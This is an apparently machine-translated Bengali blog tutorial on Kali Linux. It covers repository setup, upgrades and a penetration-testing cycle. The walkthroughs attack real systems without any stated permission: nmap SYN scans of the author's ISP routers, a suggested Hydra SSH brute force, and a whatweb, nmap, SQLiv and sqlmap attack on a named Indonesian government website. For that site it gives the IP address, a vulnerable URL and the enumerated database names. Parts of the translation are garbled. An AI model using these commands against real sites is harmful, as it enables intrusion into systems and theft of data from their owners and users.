কালী লিনাক্স টিউটোরিয়াল

Kali Linux Tutorial



আপনি যদি একজন বিশেষজ্ঞ বা কমপক্ষে লিনাক্স, কমান্ড এবং পরিবেশের সাথে পরিচিত হন, আপনার মেশিনে শুধু কালি লিনাক্স ইনস্টল করেছেন, কালি লিনাক্সের মাস্টার বা নৈতিক হ্যাকার হতে চান তাহলে আপনি সঠিক জায়গায় আছেন। এই প্রবন্ধে, আমি লিনাক্স ব্যবহারকারীদের জন্য কালী লিনাক্স টিউটোরিয়ালটি কভার করব যা কালির সাথে ইতিমধ্যেই পরিচিত নয় এবং কালী ব্যবহার করার সময় হ্যাকিং এবং নিরাপত্তা পরীক্ষার জন্য ব্যবহৃত কিছু মৌলিক কৌশল সম্পর্কে আপনাকে শুরু করব।

কালী লিনাক্স কি?

কালী লিনাক্স, ( প্রথম 13 মার্চ, 2013 এ মুক্তি পায় ) যা আনুষ্ঠানিকভাবে ব্যাকট্র্যাক নামে পরিচিত ছিল, যা সিকিউরিটি ফার্ম অফেনসিভ সিকিউরিটি দ্বারা বিকশিত, এটি ডেবিয়ানের টেস্টিং শাখার উপর ভিত্তি করে একটি ফরেনসিক এবং নিরাপত্তা-কেন্দ্রিক বিতরণ। কালী লিনাক্স অনুপ্রবেশ পরীক্ষা, ডেটা পুনরুদ্ধার এবং হুমকি সনাক্তকরণের কথা মাথায় রেখে ডিজাইন করা হয়েছে। বিতরণকারী ব্যবহারকারীদের আরও যুগোপযোগী নিরাপত্তা উপযোগিতা প্রদানের প্রয়াসে এই বছরের শুরুতে প্রকল্পটি একটি রোলিং রিলিজ মডেলের দিকে চলে যায়। কালী লিনাক্স বিনামূল্যে, এবং সর্বদা থাকবে। এটিতে 600+ অনুপ্রবেশ পরীক্ষার সরঞ্জাম অন্তর্ভুক্ত রয়েছে।







কালী লিনাক্স কেন? এটা আপনার জন্য সঠিক?

কালী লিনাক্স সম্প্রতি বেশ জনপ্রিয়তা অর্জন করেছে। এবং এর পিছনে একটি কারণ আছে। জনপ্রিয় সংস্কৃতিতে হ্যাকিং শীতল কাজ হিসেবে ফিরে এসেছে এবং এটি টিভি সিরিজ মি Mr. রোবটকে উল্লেখযোগ্যভাবে দায়ী করা যেতে পারে। মি Mr. রোবটের জনপ্রিয়তা কালি লিনাক্সকে নতুন ব্যবহারকারী পেতে সাহায্য করেছে। লিনাক্স সম্পর্কে খুব কম জ্ঞান বা কম্পিউটার সুরক্ষা সম্পর্কিত কিছু মানুষ এখন তাদের প্রধান লিনাক্স বিতরণ হিসাবে কালিকে ব্যবহার করার চেষ্টা করছে।



আমাদের সর্বাধিক উন্নত অনুপ্রবেশ পরীক্ষা বিতরণ, কখনও। - কালী লিনাক্স ডেভেলপার। (এটি পৃষ্ঠার একেবারে শীর্ষে কালি.অর্গের মূল পৃষ্ঠায় লেখা আছে।) এই বিবৃতি থেকে আপনি কী পান? আপনি কি এটা লক্ষ্য করেছেন: APTD (Advanced Penetration Testing Distribution)? এখানে আক্ষরিক অর্থে হ্যাকিং শব্দটি নেই। কালী লিনাক্স অন্যান্য লিনাক্স ডিস্ট্রিবিউশনের মতই। সহজভাবে বলা হয়েছে, এটি একটি লিনাক্স ডিস্ট্রিবিউশন যা নিরাপত্তা-সংক্রান্ত সরঞ্জাম দিয়ে বস্তাবন্দী এবং নেটওয়ার্ক এবং কম্পিউটার নিরাপত্তা বিশেষজ্ঞদের লক্ষ্য করে। যাইহোক, কালী লিনাক্সের ব্যবহার শুধুমাত্র নিরাপত্তা এবং ফরেনসিকের উপর দৃষ্টি নিবদ্ধ করে।



লিনাক্স ডিস্ট্রিবিউশন লিনাক্স কার্নেল, মূল ইউটিলিটি এবং অ্যাপ্লিকেশনগুলির একটি সেট এবং কিছু ডিফল্ট সেটিংস ধারণকারী একটি বান্ডেল ছাড়া আর কিছুই নয়। সুতরাং, কালী লিনাক্স এই অর্থে অনন্য কিছু অফার করে না যে প্রদত্ত সরঞ্জামগুলির বেশিরভাগই যে কোনও লিনাক্স বিতরণে ইনস্টল করা যেতে পারে।





কালী লিনাক্স বিশেষভাবে পেশাদার অনুপ্রবেশ পরীক্ষা এবং নিরাপত্তা নিরীক্ষার প্রয়োজনীয়তা পূরণের জন্য প্রস্তুত। এটি লিনাক্স ব্যবহারকারীদের একটি বিশেষ উপসেটকে লক্ষ্য করে। পেন্টেস্টার, হ্যাকার, ইত্যাদি এটি একটি সুপারিশকৃত বিতরণ নয় যদি আপনি কালি আশা করেন সাধারণ উদ্দেশ্যে লিনাক্স ডেস্কটপ ডেভেলপমেন্ট, ওয়েব ডিজাইন, গেমিং, অফিস ইত্যাদির জন্য, কালী আপনাকে কিছু চ্যালেঞ্জ দিতে পারে, এমনকি আপনি একজন অভিজ্ঞ লিনাক্স ব্যবহারকারী হলেও ।

কালি লিনাক্স ইনস্টল করার পরে করণীয়

কালী লিনাক্স ইনস্টল করার পরে, আপনি ভাবতে পারেন যে এর পরে কী করতে হবে, তাই না? সবাই এই সমস্যার মুখোমুখি, চিন্তা করবেন না।



পদক্ষেপ 1: সংগ্রহস্থল সেট আপ করুন

প্রথমত, আপনি ইতিমধ্যে এটি জানতে পারেন, তবে সঠিকভাবে সংগ্রহস্থল সেট করা গুরুত্বপূর্ণ। যেমনটি আমি বলেছি, কালী লিনাক্স রোলিং রিলিজ মডেল বিতরণের ব্যবহারকারীদের আরও যুগোপযোগী নিরাপত্তা উপযোগিতা প্রদানের প্রচেষ্টায় রয়েছে। সাধারণত, আপনার যদি কালি লিনাক্স নতুন করে ইনস্টল করা থাকে, তাহলে সংগ্রহস্থলটি আপনি যে মিডিয়াটি ইনস্টল করার জন্য ব্যবহার করছেন তার উল্লেখ করছে। এটি ঠিক করার জন্য আপনাকে রিপোজিটরিটি অফিসিয়াল কালি লিনাক্স রিপোজিটরিতে পরিবর্তন করতে হবে। প্রয়োজনীয় ফাইলটি নীচে অবস্থিত /etc/apt/sources.list । লিফপ্যাড টেক্সট এডিটর দিয়ে ফাইলটি খুলুন এবং এই অফিসিয়াল কালি রোলিং রিপোজিটরিতে ডিফল্ট রিপোজিটরি প্রতিস্থাপন করুন:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

পদক্ষেপ 2: আপডেট করুন এবং আপনার কালি লিনাক্স আপগ্রেড করুন

আপনার সিস্টেম আপডেট এবং আপগ্রেড করার পরে, আপনার কালী লিনাক্সকে সর্বশেষ সংস্করণে সিঙ্ক করুন। এটি করতে টার্মিনালটি খুলুন এবং টাইপ করুন:

apt update -y && apt upgrade -y && apt dist-upgrade 

এপটি আপডেট কমান্ড ডাউনলোড করে এবং প্যাকেজগুলি সংগ্রহস্থল থেকে তথ্য তালিকাভুক্ত করে এবং প্যাকেজের নতুন সংস্করণ এবং তাদের নির্ভরতার তথ্য পেতে তাদের আপডেট করে।

অ্যাপটি আপগ্রেড কমান্ড ইনস্টল করা কালি লিনাক্স প্যাকেজগুলির নতুন সংস্করণ ডাউনলোড এবং ইনস্টল করে যতক্ষণ এটি নির্ভরতার উপর ত্রুটি না থাকে।

এপটি ডিসট-আপগ্রেড সব প্যাকেজকে নতুন উপলব্ধ সংস্করণে আপডেট করবে তা যাই হোক না কেন। এবং প্রয়োজন অনুসারে নির্ভরতাগুলি ইনস্টল এবং অপসারণ করুন (প্যাকেজগুলি সন্তুষ্ট করার জন্য নির্ভরতাগুলি ইনস্টল করুন, স্পষ্টতই, কিন্তু অনাথ হয়ে যাওয়া নির্ভরতাগুলিও সরান যদি আপডেট হওয়া প্যাকেজের আর নির্ভরতার প্রয়োজন না হয়।

কালি লিনাক্সের সাথে বেসিক পেনিট্রেশন টেস্টিং কনসেপ্ট

আপনি সেই পদক্ষেপগুলি সফলভাবে সম্পন্ন করার পরে, লক্ষ্যযুক্ত সিস্টেমের উপর ভিত্তি করে কালি লিনাক্সের সাথে আপনি তিনটি প্রধান কাজ করতে পারেন:

  1. ওয়্যারলেস নেটওয়ার্ক হ্যাকিং - ওয়াইফাই হ্যাকিং, ফিসিং, এআরপি বিষক্রিয়া ইত্যাদি।
  2. ওয়েব অ্যাপস হ্যাকিং -এসকিউএল ইনজেকশন, ক্রস-সাইট রিকোয়েস্ট ফোরজি (সিএসআরএফ), ওয়েব ফিসিং ইত্যাদি।
  3. ডিভাইস হ্যাকিং - লক্ষ্য নিয়ন্ত্রণ মেশিন শোষণ

আমি আইওটি হ্যাকিং অন্তর্ভুক্ত করছি না, এর অর্থ এই নয় যে কালী লিনাক্সের সেই উদ্দেশ্যে কোন ক্ষমতা নেই। কিন্তু, আক্ষরিকভাবে এটি ডিভাইস হ্যাকিং এর অন্তর্ভুক্ত হতে পারে। যেহেতু ডিভাইসটির শারীরিক গঠন এবং রূপ রয়েছে। এই টিউটোরিয়ালে আমি তাদের প্রাথমিক জ্ঞান কভার করেছি। যেহেতু, কালী লিনাক্স বিশাল, এটি একটি নিবন্ধে খাপ খায় না!

আপনার আরও জানতে হবে, অনুপ্রবেশ পরীক্ষার চক্র বা পদ্ধতি। তারা হল:

  1. Reconnaissance - তথ্য সংগ্রহ
  2. স্ক্যান করা হচ্ছে
  3. অপারেশন
  4. শোষণ-পরবর্তী

কালি লিনাক্সের সাথে ওয়্যারলেস নেটওয়ার্ক হ্যাকিং

ওয়্যারলেস নেটওয়ার্ক হ্যাকিংয়ের ক্ষেত্রে, ভিকটিম ভিন্ন হতে পারে। কারণ, ওয়্যারলেস নেটওয়ার্কে বেশ কিছু জিনিস থাকে যেমন ISP (ইন্টারনেট সার্ভিস প্রোভাইডার), রাউটার এবং তার সঙ্গী (মডেম, হাব, সুইচ ইত্যাদি) এবং ক্লায়েন্ট (ব্যবহারকারী, সিসিটিভি, রিমোট কম্পিউটার ইত্যাদি)। তাদের দুর্বল সম্ভাবনাও রয়েছে।

ইন্টারনেট হল নেটওয়ার্ক হার্ডওয়্যারের একটি বড় এবং জটিল সমষ্টি, যা গেটওয়ে দ্বারা একসাথে সংযুক্ত। আপনার প্যাকেটগুলি যে রুটটি অনুসরণ করে তা ট্র্যাক করা আপনার একটি নির্দিষ্ট হোস্টনাম বা টার্গেট আইপি ঠিকানায় কীভাবে পৌঁছায় তা জানা গুরুত্বপূর্ণ।

কালি লিনাক্সের একটি অন্তর্নির্মিত টুল রয়েছে যার নাম ট্রেসারআউট। Traceroute আইপি প্রোটোকল সময়কে লাইভ ফিল্ড ব্যবহার করে এবং প্রতিটি গেটওয়ে থেকে কিছু হোস্টের পথ ধরে ICMP TIME_EXCEEDED প্রতিক্রিয়া বের করার চেষ্টা করে। Traceroute একটি আইপি প্যাকেট রুট ট্রেস করার চেষ্টা করে একটি আইপি প্যাকেট কিছু ইন্টারনেট হোস্টকে অনুসরণ করে একটি ছোট টিটিএল (লাইভ টু টাইম) দিয়ে প্রোব প্যাকেট চালু করে তারপর আইসিএমপি সময় শুনতে একটি গেটওয়ে থেকে উত্তর ছাড়িয়ে যায়। Traceroute ব্যবহার করে আমাদের সংযোগ পরিচালনা করার জন্য ব্যবহৃত একটি ISP রাউটার কিভাবে ট্রেস করা যায় তা আমি আপনাকে এবং উদাহরণ দেব।

1. স্বীকৃতি

তথ্য সংগ্রহ সবচেয়ে গুরুত্বপূর্ণ লাফ শুরু, এই পদক্ষেপটি মিস করবেন না। এই ধাপে, আমাদের উদ্দেশ্য হল যতটা সম্ভব দরকারী তথ্য আমরা পেতে পারি, এবং তারপর এই তথ্যটি পরবর্তী পদক্ষেপের জন্য ব্যবহার করা হয়।

প্রথমে, একটি টার্মিনাল খুলুন এবং সাইটের রাস্তা ট্রেস করা শুরু করতে এই কমান্ডটি টাইপ করুন, এই ক্ষেত্রে আমি সাইটটি google.com এ সেট করেছি।

traceroute google.com 

Traceroute স্ক্রিনশট

2. স্ক্যান করা

একবার আমরা কমান্ড চালু করলে, এটি তালিকা করবে যেখানে আমাদের প্যাকেট ক্রম অনুসারে যায়। আপনি উপরে দেখতে পারেন, আমি 3 টি হপ পেয়েছি যার মধ্যে একটি হল আমার ISP সার্ভার। তালিকার প্রথম আইপি হল আমার রাউটার, যা একটি গেটওয়ে হিসাবে কাজ করে। এবং তার পরের দুটি আমার ISP- এর। এখন আসুন তারা Nmap ব্যবহার করে যে পরিষেবাটি চালাচ্ছে তা পরীক্ষা করে দেখি। সুতরাং, আমরা যে লক্ষ্যগুলি স্ক্যান করতে যাচ্ছি তা হল 10.152.192.1 এবং 10.13.223.102 । টার্মিনালে আমি নিম্নলিখিত কমান্ডটি চালাচ্ছি:

nmap -v -sS [IP Target] -Pn 

কমান্ডের যুক্তি ভেঙে দেওয়া যাক:

-v = verbosity মোড সক্ষম করুন

-sS = TCP SYN স্ক্যান কৌশল ব্যবহার করুন

-Pn = সমস্ত হোস্টকে অনলাইনের মতো বিবেচনা করুন -হোস্ট আবিষ্কার বাদ দিন

এবং এখানে আমরা ফলাফল পেয়েছি।

nmap স্ক্রিন শট 2

দুlyখের বিষয়, সব পোর্ট চালু 10.152.192.1 ফিল্টার করা হয়, এর অর্থ হল সমস্ত ইনকামিং টিসিপি সংযোগ এই আইপি তে আইডিএস বা ফায়ারওয়াল দ্বারা ব্লক করা আছে। এখন, দ্বিতীয় টার্গেটে আরেকটি স্ক্যান করা যাক।

nmap স্ক্রিন শট 1

3. অপারেশন

এই পদ্ধতিতে, আমি আসল শোষণ পরিচালনা করার উদ্দেশ্যে নই, পরিবর্তে আমি আপনাকে কীভাবে দেখাব। উপরের Nmap স্ক্যান ফলাফলের উপর ভিত্তি করে আমরা জানি যে এই IP- এ SSH সার্ভার 22 পোর্টে চলছে, এবং এটি খোলা আছে। এটা নিষ্ঠুর হতে খোলা, হাহাহা! আমরা গর্তটি খুঁজে পেয়েছি, এই এসএসএইচ সার্ভারটি সম্ভাব্য গর্ত যা আমরা প্রবেশ করার চেষ্টা করতে পারি। কালী লিনাক্সে বেশ কয়েকটি সরঞ্জাম রয়েছে যা এসএসএইচ প্রোটোকলের বিরুদ্ধে ব্রুটফোর্স বা অভিধান আক্রমণ সমর্থন করে। সবচেয়ে জনপ্রিয় এবং শক্তিশালী হল হাইড্রা।

ঠিক আছে, এটি একটি টার্গেটেড সার্ভারের বিরুদ্ধে অনুপ্রবেশ পরীক্ষা পরিচালনা করার একটি মৌলিক পদ্ধতি ছিল, যা আমাদের উদাহরণে এখানে আমার ISP সার্ভার।

কালি লিনাক্সের সাথে ওয়েব হ্যাকিং অ্যাপস

প্রকৃতপক্ষে, যদি আপনি এই বিষয়ে আগ্রহী হন, তাহলে আপনি আপনার কালি লিনাক্সে DWVA (ড্যামন ভ্যালেনারেবল ওয়েব অ্যাপ) ইনস্টল করে আপনার হ্যাকিং পরিবেশ স্থাপন করতে পারেন। এটি একটি পিএইচপি/মাইএসকিউএল ওয়েব অ্যাপ্লিকেশন যা দুর্বল গর্তের গুচ্ছ রয়েছে। এর প্রধান লক্ষ্য হল নিরাপত্তা পেশাদারদের একটি আইনি পরিবেশে তাদের দক্ষতা এবং সরঞ্জামগুলি পরীক্ষা করা এবং ওয়েব ডেভেলপারদের ওয়েব অ্যাপ্লিকেশনগুলি সুরক্ষিত করার প্রক্রিয়াগুলি আরও ভালভাবে বুঝতে সহায়তা করা। আপনি এখানে Github- এ বিনামূল্যে DWVA পেতে পারেন: https://github.com/ethicalhack3r/DVWA।

আপাতত আমি আপনাকে দেখাব কিভাবে একটি বাস্তব সাইটে ওয়েব অ্যাপস হ্যাকিং করতে হয়। কিন্তু, আমাকে প্রতিশ্রুতি দিন যে এটি শুধুমাত্র শিক্ষাগত উদ্দেশ্যে সীমাবদ্ধ। আমরা এসকিউএল ইনজেকশন ব্যবহার করে আসল সাইটে আসল আক্রমণ অনুকরণ করব।

পূর্বশর্ত

আচ্ছাদিত সরঞ্জাম:

-হোয়াটওয়েব (আগে থেকে ইনস্টল করা)

-Nmap (আগে থেকে ইনস্টল করা)

- SQLiv (ম্যানুয়ালি ইনস্টল করুন)

-SQLMap (আগে থেকে ইনস্টল করা)

আমাদের আরও একটি অতিরিক্ত টুল দরকার যা Github এ এখানে পাওয়া যায়: https://github.com/Hadesy2k/sqliv, প্রথমে আমাদের কালী লিনাক্সে এটি ইনস্টল করুন। SQLiv নামের এই টুলটি নির্দিষ্ট ডোমেইন (ক্রলিং সহ) প্রদান করে টার্গেটেড স্ক্যানিং করতে সক্ষম। টার্মিনালে টাইপ করুন:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

লক্ষ্য: www.trenggalekkab.go.id

1. স্বীকৃতি

আমরা যতটা উপকারী তথ্য সংগ্রহ করতে পারি। আমরা ওয়েব পেজ খুলতে পারি এবং এই সাইটে কোন অ্যাপ্লিকেশন চলছে তা সনাক্ত করতে পারি। প্রথমত, এটি কি ধরনের ওয়েবসাইট তা যাচাই করা যাক। আমরা এটি করতে হোয়াটওয়েব ব্যবহার করব।

whatweb www.trenggalekkab.go.id 

কি ওয়েব স্ক্রিনশট

আপনি উপরের ফলাফল দেখতে পারেন, লক্ষ্যটি ইন্দোনেশিয়ায় অবস্থিত। এটি চলছে Apache v2.2.27 এর ওয়েব সার্ভারে এবং আছে পিএইচপি v5.4.31 , এর একটি IP ঠিকানা আছে 103.247.21.142 । ঠিক আছে, এটি একটি নোট নিন। আপনার ওয়েবপৃষ্ঠাটি দেখার প্রয়োজন হতে পারে, ফাইল বা পৃষ্ঠা তৈরি, URL প্যারামিটার, অথবা এমনকি লগইন ফর্ম খুঁজতে হবে। আপাতত স্ক্যানিং এর পরবর্তী ধাপের জন্য আমাদের সেই আইপি ঠিকানা দরকার।

2. স্ক্যান করা

আগের মতই, আমরা আবার Nmap ব্যবহার করে লক্ষ্যবস্তুতে কোন পোর্ট এবং পরিষেবাগুলি চলছে তা স্ক্যান করতে।

nmap -v -sS 103.247.21.142 

এবং এখানে আমরা ফলাফল পেয়েছি:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

এখানে খোলা পোর্টগুলির গুচ্ছ রয়েছে যা লক্ষ্যমাত্রায় প্রতিটি পরিষেবা পরিচালনা করে, কিন্তু যেটি চোখ ধাঁধানো মনে হয় তা হল পোর্ট 3306 এ মাইএসকিউএল পরিষেবা। এটি নির্দেশ করা হয়েছে যে এই সাইটটি ব্যবহার করছে মাইএসকিউএল ডাটাবেসে তাদের তথ্য পরিচালনা করতে। তারপরে, আমি ভাবছি যে এই সাইটে কোনও এসকিউএল ইনজেকশন দুর্বলতা আছে কিনা। সুতরাং, আমি SQLiv ব্যবহার করে সাইটটি আবার স্ক্যান করি যা আমরা ইনস্টল করেছি। আমি কমান্ড টাইপ করেছি:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

আমরা এই সাইটে 2 টি সম্ভাব্য SQL দুর্বল URL খুঁজে পেয়েছি। সেই ইউআরএলগুলির একটি নোট নিন।

3. অপারেশন

ঠিক আছে, আমরা এসকিউএল দুর্বল ইউআরএল পেয়েছি, এবং কার্যকর করার জন্য প্রস্তুত। এটি করার জন্য আমরা SQLMap ব্যবহার করব। সিনট্যাক্স হল:

sqlmap [Vulnerable URL] --dbs 

কমান্ডটি এইরকম হওয়া উচিত:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

–Dbs যুক্তি হল SQLMap কে টার্গেট ডাটাবেস পাওয়ার জন্য বলা। এখানে আমরা পেয়েছি আউটপুট:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

এসকিউএলম্যাপ 2 টি ডাটাবেস খুঁজে পেয়েছে, কিন্তু তাদের মধ্যে একটি মাত্র সংবেদনশীল তথ্য রয়েছে, যেমন অ্যাডমিন ক্রেডেনশিয়াল অ্যাকাউন্ট। এটি trengkab_trg এ। আমরা ডাটাবেসগুলি খুঁজে পাওয়ার পরে, আমাদের আরও একটি পদক্ষেপ এখনও করতে হবে। যে টেবিল এবং কলাম খুঁজে বের করা হয় এবং চূড়ান্ত পদক্ষেপ হল ডেটা ডাম্প করা। এই টার্গেট ব্যবহার করে আমি এই বিভাগে কিভাবে দেখাবো না। কমপক্ষে আপনি আক্রমণ চক্রের প্রাথমিক ধারণা এবং কিছু সরঞ্জাম ব্যবহার করে জানেন।

ডিভাইস হ্যাকিং

এই সাইটে ভবিষ্যতে একটি নিবন্ধে আমরা ডিভাইস হ্যাকিং কভার করব, সাথে থাকুন। পূর্ব-সতর্কতা হিসাবে আপনি নিশ্চিত করতে চান যে আপনি এর জন্য কিছু পাইথন জানেন।